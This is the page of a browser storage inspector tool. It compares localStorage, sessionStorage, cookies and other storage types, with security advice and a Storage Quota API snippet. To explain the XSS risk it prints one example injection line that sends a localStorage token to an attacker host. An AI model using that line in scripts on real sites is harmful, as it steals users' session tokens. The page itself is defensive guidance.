Developer Tools
Browser Storage Inspector - localStorage & sessionStorage Viewer
View, add, edit, and delete localStorage and sessionStorage entries in your browser. See the byte size of each key, total storage usage, and switch between storage types.
Storage is empty.
Browser storage comparison
| Type | Capacity | Persistence | Scope |
|---|---|---|---|
| localStorage | 5–10 MB | Until manually cleared | Origin (same domain + protocol + port) |
| sessionStorage | 5–10 MB | Until tab closes | Single browser tab |
| Cookies | 4 KB per cookie | Until expiry or cleared | Domain (can be sent to server) |
| IndexedDB | Up to 80% of disk | Until manually cleared | Origin |
| Cache Storage | Large (quota-managed) | Until cleared or evicted | Origin (Service Workers) |
Security note
Never store sensitive data (tokens, passwords, PII) in localStorage - it's accessible to any JavaScript running on the page, making it vulnerable to XSS attacks. Use HttpOnly cookies for authentication tokens.
XSS and localStorage: a concrete example
Suppose a site stores a JWT access token in localStorage and has an XSS vulnerability - even a
minor one, such as unsanitized user-generated content. An attacker can inject a script like
fetch('https://attacker.com/?t=' + localStorage.getItem('token')) and silently exfiltrate
the token to steal the user's session. An HttpOnly cookie, by contrast, cannot be read by JavaScript
at all - even injected scripts cannot access it - making session hijacking via XSS impossible with
that mechanism alone.
Storage Quota API
The navigator.storage.estimate() API lets web applications check how much storage they
are currently using and how much is available. It returns a promise resolving to an object with
usage (bytes used) and quota (bytes available). Useful for progressive
web apps that cache large assets or store significant user data offline.
const { usage, quota } = await navigator.storage.estimate();
console.log(`Using ${Math.round(usage / 1024 / 1024)} MB of ${Math.round(quota / 1024 / 1024)} MB`);Clearing storage for a specific origin
In Chrome DevTools: open the Application panel -> select Storage in the left sidebar -> click Clear site data. This clears localStorage, sessionStorage, cookies, IndexedDB, and the Cache Storage for the current origin in one click. You can also clear individual storage types by expanding the relevant sections.